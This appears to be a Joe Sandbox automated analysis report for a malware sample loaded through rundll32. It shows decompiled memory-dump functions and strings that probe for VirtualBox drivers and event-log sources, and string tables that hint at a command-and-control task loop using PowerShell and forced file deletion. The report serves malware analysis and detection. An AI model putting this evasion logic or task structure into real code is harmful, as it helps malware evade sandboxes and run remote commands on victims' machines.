                0x2152058b174
                0x2152058b17b
                0x2152058b181
                0x2152058b188
                0x2152058b192
                0x2152058b19b
                0x2152058b1a0
                0x2152058b1a8
                0x2152058b1ac
                0x2152058b1b0
                0x2152058b1b8
                0x2152058b1be
                0x2152058b1c9
                0x2152058b1d2
                0x2152058b1d8
                0x2152058b1df
                0x2152058b1e5
                0x2152058b1ec
                0x2152058b1f6
                0x2152058b1fc
                0x2152058b201
                0x2152058b214
                0x2152058b21b
                0x2152058b221
                0x2152058b229
                0x2152058b22e
                0x2152058b233
                0x2152058b23e
                0x2152058b242
                0x2152058b245
                0x2152058b255
                0x2152058b25f
                0x2152058b272
                0x2152058b27f
                0x2152058b284
                0x2152058b299
                0x2152058b29c
                0x2152058b29c
                0x2152058b2a9
                0x2152058b2bd
                0x2152058b2c5
                0x2152058b2cc
                0x2152058b2d3
                0x2152058b2da
                0x2152058b2e1
                0x2152058b2ed
                0x2152058b2ef
                0x2152058b304
                0x2152058b309
                0x2152058b312
                0x2152058b317
                0x2152058b323
                0x2152058b327
                0x2152058b32a
                0x2152058b33a
                0x2152058b344
                0x2152058b353
                0x2152058b360
                0x2152058b365
                0x2152058b37a
                0x2152058b37d
                0x2152058b37d
                0x2152058b38a
                0x2152058b39e
                0x2152058b3a6
                0x2152058b3ad
                0x2152058b3b4
                0x2152058b3bb
                0x2152058b3c2
                0x2152058b3ce
                0x2152058b3d4
                0x2152058b3e9
                0x2152058b3f0
                0x2152058b3f6
                0x2152058b3fc
                0x2152058b406
                0x2152058b40f
                0x2152058b414
                0x2152058b420
                0x2152058b424
                0x2152058b427
                0x2152058b437
                0x2152058b43d
                0x2152058b43f
                0x2152058b442
                0x2152058b44f
                0x2152058b463
                0x2152058b469
                0x2152058b478
                0x2152058b480
                0x2152058b495
                0x2152058b4a2
                0x2152058b4a7
                0x2152058b4b1
                0x2152058b4ba
                0x2152058b4bf
                0x2152058b4cb
                0x2152058b4cf
                0x2152058b4d2
                0x2152058b4e2
                0x2152058b4e8
                0x2152058b4ed
                0x2152058b4fb
                0x2152058b512
                0x2152058b51b
                0x2152058b522
                0x2152058b527
                0x2152058b52c
                0x2152058b531
                0x2152058b538
                0x2152058b53f
                0x2152058b546
                0x2152058b556
                0x2152058b561
                0x2152058b566
                0x2152058b57c
                0x2152058b589
                0x2152058b590
                0x2152058b59d
                0x2152058b5a4
                0x2152058b5aa
                0x2152058b5b1
                0x2152058b5b8
                0x2152058b5bf
                0x2152058b5c5
                0x2152058b5cc
                0x2152058b5d2
                0x2152058b5d9
                0x2152058b5de
                0x2152058b5e1
                0x2152058b5e8
                0x2152058b5ef
                0x2152058b5f5
                0x2152058b5f9
                0x2152058b5ff
                0x2152058b606
                0x2152058b610
                0x2152058b616
                0x2152058b620
                0x2152058b627
                0x2152058b62d
                0x2152058b634
                0x2152058b641
                0x2152058b648
                0x2152058b655
                0x2152058b65c
                0x2152058b662
                0x2152058b669
                0x2152058b66e
                0x2152058b675
                0x2152058b67c
                0x2152058b68d
                0x2152058b691
                0x2152058b698
                0x2152058b69e
                0x2152058b6a5
                0x2152058b6ad
                0x2152058b6b7
                0x2152058b6c3
                0x2152058b6ca
                0x2152058b6d3
                0x2152058b6d7
                0x2152058b6dd
                0x2152058b6e4
                0x2152058b6eb
                0x2152058b6ef
                0x2152058b6f4
                0x2152058b6fb
                0x2152058b6ff
                0x2152058b706
                0x2152058b70a
                0x2152058b710
                0x2152058b717
                0x2152058b71d
                0x2152058b724
                0x2152058b729
                0x2152058b730
                0x2152058b736
                0x2152058b73a
                0x2152058b742
                0x2152058b746
                0x2152058b74d
                0x2152058b75a
                0x2152058b760
                0x2152058b767
                0x2152058b76c
                0x2152058b776
                0x2152058b778
                0x2152058b77f
                0x2152058b783
                0x2152058b789
                0x2152058b790
                0x2152058b796
                0x2152058b79d
                0x2152058b7a2
                0x2152058b7ac
                0x2152058b7b7
                0x2152058b7bd
                0x2152058b7c4
                0x2152058b7ca
                0x2152058b7d9
                0x2152058b7de
                0x2152058b7e5
                0x2152058b7eb
                0x2152058b7f5
                0x2152058b808
                0x2152058b80b
                0x2152058b80f
                0x2152058b816
                0x2152058b827
                0x2152058b829
                0x2152058b836
                0x2152058b849
                0x2152058b84f
                0x2152058b853
                0x2152058b85d
                0x2152058b862
                0x2152058b869
                0x2152058b86e
                0x2152058b874
                0x2152058b87b
                0x2152058b881
                0x2152058b888
                0x2152058b892
                0x2152058b89b
                0x2152058b8a0
                0x2152058b8a8
                0x2152058b8ac
                0x2152058b8b0
                0x2152058b8b8
                0x2152058b8be
                0x2152058b8c9
                0x2152058b8d2
                0x2152058b8d8
                0x2152058b8df
                0x2152058b8e5
                0x2152058b8ec
                0x2152058b8f6
                0x2152058b8fc
                0x2152058b906
                0x2152058b919
                0x2152058b91c
                0x2152058b920
                0x2152058b927
                0x2152058b92d
                0x2152058b932
                0x2152058b937
                0x2152058b938
                0x2152058b93d
                0x2152058b93e
                0x2152058b943
                0x2152058b944
                0x2152058b94a
                0x2152058b94f
                0x2152058b950
                0x2152058b955
                0x2152058b956
                0x2152058b95b
                0x2152058b95c
                0x2152058b962
                0x2152058b967
                0x2152058b968
                0x2152058b96d
                0x2152058b96e
                0x2152058b973
                0x2152058b974
                0x2152058b97a
                0x2152058b97f
                0x2152058b980
                0x2152058b985
                0x2152058b986
                0x2152058b98b
                0x2152058b98c
                0x2152058b992
                0x2152058b997
                0x2152058b998
                0x2152058b99d
                0x2152058b99e
                0x2152058b9a3
                0x2152058b9a4
                0x2152058b9aa
                0x2152058b9af
                0x2152058b9b0
                0x2152058b9b5
                0x2152058b9b6
                0x2152058b9bb
                0x2152058b9bc
                0x2152058b9c2
                0x2152058b9c9
                0x2152058b9d7
                0x2152058b9db
                0x2152058b9e5
                0x2152058b9ec
                0x2152058b9f1
                0x2152058b9f1
                0x2152058b9f8
                0x2152058b9fd
                0x2152058ba04
                0x2152058ba0b
                0x2152058ba12
                0x2152058ba19
                0x2152058ba26
                0x2152058ba2d
                0x2152058ba32
                0x2152058ba3b
                0x2152058ba40
                0x2152058ba4a
                0x2152058ba51
                0x2152058ba56
                0x2152058ba5d
                0x2152058ba69
                0x2152058ba70
                0x2152058ba7d
                0x2152058ba84
                0x2152058ba8a
                0x2152058ba92
                0x2152058ba99
                0x2152058baa2
                0x2152058baa9
                0x2152058bab2
                0x2152058bab9
                0x2152058babf
                0x2152058bac6
                0x2152058bacc
                0x2152058bad3
                0x2152058badf
                0x2152058bae6
                0x2152058baeb
                0x2152058baf2
                0x2152058baf9
                0x2152058bb05
                0x2152058bb0c
                0x2152058bb18
                0x2152058bb1f
                0x2152058bb24
                0x2152058bb33
                0x2152058bb38
                0x2152058bb47
                0x2152058bb4e
                0x2152058bb55
                0x2152058bb5b
                0x2152058bb62
                0x2152058bb68
                0x2152058bb6f
                0x2152058bb75
                0x2152058bb7c
                0x2152058bb81
                0x2152058bb86
                0x2152058bb8f
                0x2152058bb91
                0x2152058bb96
                0x2152058bb9d
                0x2152058bba4
                0x2152058bbab
                0x2152058bbb2
                0x2152058bbb7
                0x2152058bbbd
                0x2152058bbc0
                0x2152058bbc7
                0x2152058bbce
                0x2152058bbd3
                0x2152058bbd7
                0x2152058bbdb
                0x2152058bbe3
                0x2152058bbe7
                0x2152058bbeb
                0x2152058bbf8
                0x2152058bbfc
                0x2152058bc02
                0x2152058bc0a
                0x2152058bc11
                0x2152058bc1a
                0x2152058bc1e
                0x2152058bc28
                0x2152058bc2e
                0x2152058bc32
                0x2152058bc38
                0x2152058bc45
                0x2152058bc4a
                0x2152058bc51
                0x2152058bc56
                0x2152058bc58
                0x2152058bc5d
                0x2152058bc5e
                0x2152058bc65
                0x2152058bc67
                0x2152058bc6c
                0x2152058bc6d
                0x2152058bc74
                0x2152058bc76
                0x2152058bc7b
                0x2152058bc80
                0x2152058bc82
                0x2152058bc87
                0x2152058bc8b
                0x2152058bc90
                0x2152058bc98
                0x2152058bc9c
                0x2152058bca0
                0x2152058bcab
                0x2152058bcb0
                0x2152058bcba
                0x2152058bcbf
                0x2152058bcc1
                0x2152058bcc6
                0x2152058bcc7
                0x2152058bcce
                0x2152058bcd0
                0x2152058bcd5
                0x2152058bcd6
                0x2152058bcdd
                0x2152058bcdf
                0x2152058bce4
                0x2152058bce9
                0x2152058bceb
                0x2152058bcf0
                0x2152058bcf4
                0x2152058bcf9
                0x2152058bd04
                0x2152058bd0b
                0x2152058bd12
                0x2152058bd1f
                0x2152058bd23
                0x2152058bd2c
                0x2152058bd2f
                0x2152058bd36
                0x2152058bd3a
                0x2152058bd3f
                0x2152058bd4c
                0x2152058bd50
                0x2152058bd55
                0x2152058bd5b
                0x2152058bd5d
                0x2152058bd6a
                0x2152058bd6c
                0x2152058bd79
                0x2152058bd7e
                0x2152058bd81
                0x2152058bd89
                0x2152058bd95
                0x2152058bd9e
                0x2152058bda5
                0x2152058bdaa
                0x2152058bdb1
                0x2152058bdb6
                0x2152058bdbd
                0x2152058bdc4
                0x2152058bdcb
                0x2152058bdcf
                0x2152058bdf0
                0x2152058bdf5
                0x2152058bdf9
                0x2152058be00
                0x2152058be05
                0x2152058be10
                0x2152058be15
                0x2152058be1f
                0x2152058be24
                0x2152058be26
                0x2152058be2b
                0x2152058be2c
                0x2152058be33
                0x2152058be35
                0x2152058be3a
                0x2152058be3b
                0x2152058be42
                0x2152058be44
                0x2152058be49
                0x2152058be4e
                0x2152058be50
                0x2152058be55
                0x2152058be59
                0x2152058be5e
                0x2152058be67
                0x2152058be6c
                0x2152058be71
                0x2152058be80
                0x2152058be87
                0x2152058be8f
                0x2152058be94
                0x2152058be9b
                0x2152058bea0
                0x2152058bea2
                0x2152058bea7
                0x2152058bea8
                0x2152058beaf
                0x2152058beb1
                0x2152058beb6
                0x2152058beb7
                0x2152058bebe
                0x2152058bec0
                0x2152058bec5
                0x2152058beca
                0x2152058becc
                0x2152058bed1
                0x2152058bed5
                0x2152058beda
                0x2152058bee2
                0x2152058bee6
                0x2152058bef4
                0x2152058bf2d
                0x2152058bf32
                0x2152058bf35
                0x2152058bf3d
                0x2152058bf44
                0x2152058bf4c
                0x2152058bf51
                0x2152058bf58
                0x2152058bf5d
                0x2152058bf5f
                0x2152058bf64
                0x2152058bf65
                0x2152058bf6c
                0x2152058bf6e
                0x2152058bf73
                0x2152058bf74
                0x2152058bf7b
                0x2152058bf7d
                0x2152058bf82
                0x2152058bf87
                0x2152058bf89
                0x2152058bf8e
                0x2152058bf92
                0x2152058bf97
                0x2152058bf9f
                0x2152058bfa3
                0x2152058bfa7
                0x2152058bfae
                0x2152058bfb4
                0x2152058bfbb
                0x2152058bfc1
                0x2152058bfd0
                0x2152058bfd6
                0x2152058bfda
                0x2152058bfe0
                0x2152058bfe7
                0x2152058bfed
                0x2152058bff4
                0x2152058bffa
                0x2152058c001
                0x2152058c007
                0x2152058c00e
                0x2152058c014
                0x2152058c01b
                0x2152058c021
                0x2152058c028
                0x2152058c02e
                0x2152058c035
                0x2152058c03b
                0x2152058c042
                0x2152058c048
                0x2152058c04f
                0x2152058c055
                0x2152058c05c
                0x2152058c062
                0x2152058c074
                0x2152058c079
                0x2152058c07b
                0x2152058c080
                0x2152058c081
                0x2152058c086
                0x2152058c087
                0x2152058c08c
                0x2152058c08d
                0x2152058c093
                0x2152058c098
                0x2152058c099
                0x2152058c09e
                0x2152058c09f
                0x2152058c0a4
                0x2152058c0a5
                0x2152058c0ab
                0x2152058c0b2
                0x2152058c0d3

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Sleep$FolderPathSpecial$ProcessTerminateThreadUninitializelstrcat$CurrentInitializeThread32$CloseCreateFirstHandleNextObjectOpenSecuritySingleSnapshotToolhelp32Wait
                • String ID: -Recurse"$" -Force$127.0.0.1$; Remove-Item -Path "$Command : $Domain name: $User name: $\wab.exe$dex$dij$file_entry_point$gdt$iKInPE9WrB$ins$powershell$response_status$sdl$shi$task$task_data$task_id$tasks
                • API String ID: 3213461338-3323971348
                • Opcode ID: ef9d4ee9269239150bda406fe7dbdd15bbfd50020378915354a866fec66954a0
                • Instruction ID: 16f9288759ca391dfc080a8aba478a5409c9816b9090ac54404940955e9d0b26
                • Opcode Fuzzy Hash: ef9d4ee9269239150bda406fe7dbdd15bbfd50020378915354a866fec66954a0
                • Instruction Fuzzy Hash: 8B135A33302EA5C9FB20AF74D8583E923A5FBA5348F501551EE594BAAEDF78C685C340
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CD4D0 Relevance: 42.1, APIs: 6, Strings: 18, Instructions: 139COMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 55%
                			E00000215215205CD4D0(void* __ecx, long long __rbx, signed long long __rdi, long long __rsi) {
				signed char _t67;
				void* _t83;
				void* _t87;
				signed long long _t100;
				signed long long _t121;
				void* _t142;
				signed long long _t147;
				WCHAR* _t152;
				void* _t153;
				void* _t155;
				signed long long _t156;
				void* _t158;

				_t147 = __rdi;
				_t75 = __ecx;
				 *((long long*)(_t155 + 8)) = __rbx;
				 *((long long*)(_t155 + 0x10)) = __rsi;
				 *((long long*)(_t155 + 0x18)) = __rdi;
				_t153 = _t155 - 0x5f0;
				_t156 = _t155 - 0x6f0;
				_t100 =  *0x2067c720; // 0xca1645d940e
				 *(_t153 + 0x5e0) = _t100 ^ _t156;
				 *((long long*)(_t156 + 0x30)) = L"System32\\drivers\\VBoxMouse.sys";
				r8d = 0x208;
				 *((long long*)(_t156 + 0x38)) = L"System32\\drivers\\VBoxGuest.sys";
				 *((long long*)(_t156 + 0x40)) = L"System32\\drivers\\VBoxSF.sys";
				 *((long long*)(_t156 + 0x48)) = L"System32\\drivers\\VBoxVideo.sys";
				 *((long long*)(_t156 + 0x50)) = L"System32\\vboxdisp.dll";
				 *((long long*)(_t156 + 0x58)) = L"System32\\vboxhook.dll";
				 *((long long*)(_t156 + 0x60)) = L"System32\\vboxmrxnp.dll";
				 *((long long*)(_t156 + 0x68)) = L"System32\\vboxogl.dll";
				 *((long long*)(_t156 + 0x70)) = L"System32\\vboxoglarrayspu.dll";
				 *((long long*)(_t156 + 0x78)) = L"System32\\vboxoglcrutil.dll";
				 *((long long*)(_t153 - 0x80)) = L"System32\\vboxoglerrorspu.dll";
				 *((long long*)(_t153 - 0x78)) = L"System32\\vboxoglfeedbackspu.dll";
				 *((long long*)(_t153 - 0x70)) = L"System32\\vboxoglpackspu.dll";
				 *((long long*)(_t153 - 0x68)) = L"System32\\vboxoglpassthroughspu.dll";
				 *((long long*)(_t153 - 0x60)) = L"System32\\vboxservice.exe";
				 *((long long*)(_t153 - 0x58)) = L"System32\\vboxtray.exe";
				 *((long long*)(_t153 - 0x50)) = L"System32\\VBoxControl.exe";
				E00000215215205F8EF0(__ecx, 0, _t83, _t87, _t153 + 0x1d0, _t142, __rdi, _t158);
				r8d = 0x208;
				E00000215215205F8EF0(_t75, 0, _t83, _t87, _t153 - 0x40, _t142, _t147, _t158);
				 *(_t156 + 0x28) = _t147;
				GetWindowsDirectoryW(_t152);
				if (E00000215215205D00A0() == 0) goto 0x205cd617;
				__imp__Wow64DisableWow64FsRedirection();
				_t121 = _t147;
				__imp__PathCombineW();
				r8d = 0x200;
				E00000215215205F8EF0(_t75, 0, 0, _t87, _t153 + 0x3e0, _t153 + 0x1d0, _t147,  *((intOrPtr*)(_t156 + 0x30 + _t121 * 8)));
				E00000215215205CD1D0(_t75, L"System32\\VBoxControl.exe", _t153 + 0x3e0, _t153 + 0x1d0, L"Checking file %s ", _t153 - 0x40);
				_t67 = GetFileAttributesW(??); // executed
				if (_t67 == 0xffffffff) goto 0x205cd679;
				if ((_t67 & 0x00000010) == 0) goto 0x205cd684;
				if (_t121 + 1 - 0x11 < 0) goto 0x205cd620;
				goto 0x205cd689;
				 *((intOrPtr*)(_t156 + 0x20)) = 0;
				if ( *0x2067e430 == 8) goto 0x205cd6b2;
				if (1 - 0x1e < 0) goto 0x205cd6a0;
				goto 0x205cd711;
				if ( *0x2152067E484 == dil) goto 0x205cd711;
				if ( *0x2067e430 == 8) goto 0x205cd6da;
				if (1 - 0x1e < 0) goto 0x205cd6c8;
				goto 0x205cd6ef;
				if ( *0x2152067E46C == dil) goto 0x205cd6ef;
				GetCurrentProcess();
				 *((long long*)( *0x2152067E488))();
				if ( *((intOrPtr*)(_t156 + 0x20)) == 0) goto 0x205cd711;
				__imp__Wow64RevertWow64FsRedirection();
				return E00000215215205F59D0(1,  *(_t153 + 0x5e0) ^ _t156, _t156 + 0x20, _t153 - 0x40);
			}















                0x215205cd4d0
                0x215205cd4d0
                0x215205cd4d0
                0x215205cd4d5
                0x215205cd4da
                0x215205cd4e0
                0x215205cd4e8
                0x215205cd4ef
                0x215205cd4f9
                0x215205cd509
                0x215205cd51c
                0x215205cd522
                0x215205cd52e
                0x215205cd53a
                0x215205cd546
                0x215205cd552
                0x215205cd55e
                0x215205cd56a
                0x215205cd576
                0x215205cd582
                0x215205cd58e
                0x215205cd599
                0x215205cd5a4
                0x215205cd5af
                0x215205cd5ba
                0x215205cd5c5
                0x215205cd5d0
                0x215205cd5d4
                0x215205cd5df
                0x215205cd5e5
                0x215205cd5f8
                0x215205cd5fd
                0x215205cd60a
                0x215205cd611
                0x215205cd619
                0x215205cd630
                0x215205cd63f
                0x215205cd645
                0x215205cd661
                0x215205cd66a
                0x215205cd673
                0x215205cd677
                0x215205cd680
                0x215205cd682
                0x215205cd690
                0x215205cd6a3
                0x215205cd6ae
                0x215205cd6b0
                0x215205cd6c1
                0x215205cd6cb
                0x215205cd6d6
                0x215205cd6d8
                0x215205cd6e8
                0x215205cd6ef
                0x215205cd6fd
                0x215205cd704
                0x215205cd70b
                0x215205cd73a

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: Wow64$Redirection$AttributesCombineCurrentDirectoryDisableFilePathProcessRevertWindows
                • String ID: Checking file %s $System32\VBoxControl.exe$System32\drivers\VBoxGuest.sys$System32\drivers\VBoxMouse.sys$System32\drivers\VBoxSF.sys$System32\drivers\VBoxVideo.sys$System32\vboxdisp.dll$System32\vboxhook.dll$System32\vboxmrxnp.dll$System32\vboxogl.dll$System32\vboxoglarrayspu.dll$System32\vboxoglcrutil.dll$System32\vboxoglerrorspu.dll$System32\vboxoglfeedbackspu.dll$System32\vboxoglpackspu.dll$System32\vboxoglpassthroughspu.dll$System32\vboxservice.exe$System32\vboxtray.exe
                • API String ID: 2137468328-1036852472
                • Opcode ID: 516fd082578d430764e9c848e0d414f1b568b980de21ec9c37c941b3060ac9f4
                • Instruction ID: 40555b7256b83e45436d706fd905fa48a50e1ae9bd0f3b6c4894e705e4bc2650
                • Opcode Fuzzy Hash: 516fd082578d430764e9c848e0d414f1b568b980de21ec9c37c941b3060ac9f4
                • Instruction Fuzzy Hash: 2B612A37202F60D5EB608B14E8482D973A5FBA4794FA40266DE8E57B6CEF38D685C740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CDCC0 Relevance: 38.7, APIs: 14, Strings: 8, Instructions: 191memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 958 215205cdcc0-215205cdd22 call 215205d0410 961 215205cdfcb-215205cdfce 958->961 962 215205cdd28-215205cdd68 SysAllocString * 2 958->962 963 215205cdfb2-215205cdfca call 215205f59d0 961->963 964 215205cddc0-215205cddc3 962->964 965 215205cdd6a-215205cdd6d 962->965 966 215205cddce-215205cddd0 964->966 967 215205cddc5-215205cddc8 SysFreeString 964->967 968 215205cdd6f-215205cdd8c 965->968 969 215205cddb7-215205cddba SysFreeString 965->969 971 215205cddd6-215205cdde5 966->971 972 215205cdf97-215205cdfaa 966->972 967->966 976 215205cdd96-215205cdd98 968->976 969->964 974 215205cddeb 971->974 975 215205cdf77-215205cdf91 CoUninitialize 971->975 972->963 977 215205cddf3-215205cddf6 974->977 975->972 976->969 978 215205cdd9a-215205cddb1 CoUninitialize 976->978 980 215205cdf6f 977->980 981 215205cddfc-215205cde1a 977->981 978->969 980->975 986 215205cde20-215205cde3c 981->986 987 215205cdf6b 981->987 989 215205cde42-215205cde44 986->989 987->980 990 215205cdf52-215205cdf63 989->990 991 215205cde4a-215205cde52 989->991 990->977 997 215205cdf69 990->997 991->990 992 215205cde58-215205cde5a 991->992 993 215205cde60-215205cde73 StrCmpIW 992->993 994 215205cdf48-215205cdf4c VariantClear 992->994 993->994 996 215205cde79-215205cdeb8 VariantClear SafeArrayAccessData 993->996 994->990 996->994 999 215205cdebe-215205cdeee SafeArrayGetLBound SafeArrayGetUBound 996->999 997->980 1000 215205cdef0-215205cdf08 SafeArrayGetElement 999->1000 1001 215205cdf3f-215205cdf42 SafeArrayUnaccessData 999->1001 1002 215205cdf10-215205cdf1e call 215206019f0 1000->1002 1001->994 1005 215205cdf20-215205cdf29 1002->1005 1006 215205cdf39 1002->1006 1005->1002 1007 215205cdf2b-215205cdf35 1005->1007 1006->1001 1007->1000 1008 215205cdf37 1007->1008 1008->1001
                C-Code - Quality: 24%
                			E00000215215205CDCC0(void* __edx, long long __rbx, long long __rdi, long long __rsi, long long __r14) {
				void* _t80;
				void* _t81;
				signed char _t87;
				void* _t88;
				intOrPtr _t91;
				void* _t100;
				void* _t109;
				signed long long _t130;
				long long _t134;
				intOrPtr* _t153;
				long long _t189;
				void* _t191;
				void* _t192;
				signed long long _t193;
				long long _t203;
				void* _t207;

				_t189 = __rsi;
				_t191 = _t192 - 0x47;
				_t193 = _t192 - 0xb0;
				_t130 =  *0x2067c720; // 0xca1645d940e
				 *(_t191 + 0x37) = _t130 ^ _t193;
				r12d = 0;
				 *((long long*)(_t191 + 0x1f)) = L"vboxvideo";
				 *((long long*)(_t191 - 0x21)) = _t203;
				 *((long long*)(_t191 + 0x27)) = L"VBoxVideoW8";
				_t134 = L"VBoxWddm";
				 *((long long*)(_t191 - 0x11)) = _t203;
				 *((long long*)(_t191 + 0x2f)) = _t134;
				r15d = r12d;
				 *((long long*)(_t191 - 0x29)) = _t203;
				_t81 = E00000215215205D0410(_t80, _t191 - 0x21, _t191 - 0x11, __rsi); // executed
				if (_t81 == 0) goto 0x205cdfcb;
				 *((long long*)(_t193 + 0xd0)) = __rbx;
				 *((long long*)(_t193 + 0xd8)) = _t189;
				 *((long long*)(_t193 + 0xe0)) = __rdi;
				__imp__#2();
				__imp__#2();
				if (_t134 == 0) goto 0x205cddc0;
				if (_t134 == 0) goto 0x205cddb7;
				 *((long long*)(_t193 + 0x28)) = _t191 - 0x29;
				_t18 = _t203 + 0x30; // 0x30
				r9d = _t18;
				 *((long long*)(_t193 + 0x20)) = _t203;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x21)))) + 0xa0))() >= 0) goto 0x205cddb7;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x21)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x11)))) + 0x10))();
				__imp__CoUninitialize();
				__imp__#6();
				if (_t134 == 0) goto 0x205cddce;
				__imp__#6();
				if (r12d == 0) goto 0x205cdf97;
				_t153 =  *((intOrPtr*)(_t191 - 0x29));
				 *((long long*)(_t191 - 0x31)) = _t203;
				 *((intOrPtr*)(_t191 - 0x35)) = r12d;
				if (_t153 == 0) goto 0x205cdf77;
				 *((long long*)(_t193 + 0xe8)) = __r14;
				if (r15d != 0) goto 0x205cdf6f;
				 *((long long*)(_t193 + 0x20)) = _t191 - 0x35;
				_t32 = _t207 + 1; // 0x1, executed
				r8d = _t32;
				 *((intOrPtr*)( *_t153 + 0x20))();
				if ( *((intOrPtr*)(_t191 - 0x35)) == r12d) goto 0x205cdf6b;
				 *((long long*)(_t193 + 0x28)) = _t203;
				r8d = 0;
				 *((long long*)(_t193 + 0x20)) = _t203;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x31)))) + 0x20))() < 0) goto 0x205cdf52;
				_t87 =  *(_t191 - 9) & 0x0000ffff;
				if (_t87 == 1) goto 0x205cdf52;
				if ((_t87 & 0x00000008) == 0) goto 0x205cdf48;
				__imp__StrCmpIW();
				if (_t87 != 0) goto 0x205cdf48;
				__imp__#9();
				 *((long long*)(_t193 + 0x28)) = _t203;
				r8d = 0;
				 *((long long*)(_t193 + 0x20)) = _t203;
				_t88 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x31)))) + 0x20))();
				__imp__#23();
				if (_t88 < 0) goto 0x205cdf48;
				__imp__#20();
				__imp__#19();
				_t109 =  *((intOrPtr*)(_t191 - 0x19)) -  *((intOrPtr*)(_t191 - 0x15)) + 1;
				 *((intOrPtr*)(_t191 - 0x39)) = r12d;
				if (_t109 <= 0) goto 0x205cdf3f;
				__imp__#25();
				if (E00000215215206019F0( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x31)))),  *((intOrPtr*)(_t191 + 0xf)),  *((intOrPtr*)(_t191 + 0x1f))) == 0) goto 0x205cdf39;
				if (r12d + 1 - 3 < 0) goto 0x205cdf10;
				_t91 =  *((intOrPtr*)(_t191 - 0x39)) + 1;
				 *((intOrPtr*)(_t191 - 0x39)) = _t91;
				if (_t91 - _t109 < 0) goto 0x205cdef0;
				goto 0x205cdf3f;
				r15d = 1;
				__imp__#24();
				__imp__#9();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x31)))) + 0x10))();
				if ( *((intOrPtr*)(_t191 - 0x29)) != 0) goto 0x205cddf3;
				goto 0x205cdf6f;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x29)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x21)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x11)))) + 0x10))();
				__imp__CoUninitialize(); // executed
				return E00000215215205F59D0(_t100,  *(_t191 + 0x37) ^ _t193,  *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x11)))), _t191 - 9);
			}



















                0x215205cdcc0
                0x215205cdcc6
                0x215205cdccb
                0x215205cdcd2
                0x215205cdcdc
                0x215205cdce0
                0x215205cdcea
                0x215205cdcf9
                0x215205cdcfd
                0x215205cdd05
                0x215205cdd0c
                0x215205cdd10
                0x215205cdd14
                0x215205cdd17
                0x215205cdd1b
                0x215205cdd22
                0x215205cdd28
                0x215205cdd37
                0x215205cdd3f
                0x215205cdd47
                0x215205cdd57
                0x215205cdd68
                0x215205cdd6d
                0x215205cdd77
                0x215205cdd7c
                0x215205cdd7c
                0x215205cdd84
                0x215205cdd98
                0x215205cdda4
                0x215205cddae
                0x215205cddb1
                0x215205cddba
                0x215205cddc3
                0x215205cddc8
                0x215205cddd0
                0x215205cddd6
                0x215205cddda
                0x215205cddde
                0x215205cdde5
                0x215205cddeb
                0x215205cddf6
                0x215205cde03
                0x215205cde0f
                0x215205cde0f
                0x215205cde13
                0x215205cde1a
                0x215205cde28
                0x215205cde34
                0x215205cde37
                0x215205cde44
                0x215205cde4a
                0x215205cde52
                0x215205cde5a
                0x215205cde6b
                0x215205cde73
                0x215205cde7d
                0x215205cde8b
                0x215205cde97
                0x215205cde9a
                0x215205cdea2
                0x215205cdeb0
                0x215205cdeb8
                0x215205cdec9
                0x215205cdeda
                0x215205cdee6
                0x215205cdee8
                0x215205cdeee
                0x215205cdefb
                0x215205cdf1e
                0x215205cdf29
                0x215205cdf2e
                0x215205cdf30
                0x215205cdf35
                0x215205cdf37
                0x215205cdf39
                0x215205cdf42
                0x215205cdf4c
                0x215205cdf59
                0x215205cdf63
                0x215205cdf69
                0x215205cdf7a
                0x215205cdf84
                0x215205cdf8e
                0x215205cdf91
                0x215205cdfca

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ArraySafe$String$AllocBoundClearDataFreeUninitializeVariant$AccessElementInitializeUnaccess
                • String ID: FileName$SELECT * FROM Win32_NTEventlogFile$Sources$System$VBoxVideoW8$VBoxWddm$WQL$vboxvideo
                • API String ID: 1020912672-1865646205
                • Opcode ID: f315b2c0157307efa368d29ffb0790b31f688a91f09fb474aacb94c57ad301c1
                • Instruction ID: 83dfc0272ab1895b548dc4416d1bc8a31368026b0d9c2e5acc3554d5571623e2
                • Opcode Fuzzy Hash: f315b2c0157307efa368d29ffb0790b31f688a91f09fb474aacb94c57ad301c1
                • Instruction Fuzzy Hash: 6B911033702E60CAEB208F61E4986EC73B0FB98B88F504556DE4AA7A58DF38D509C350
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CEA60 Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 181memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
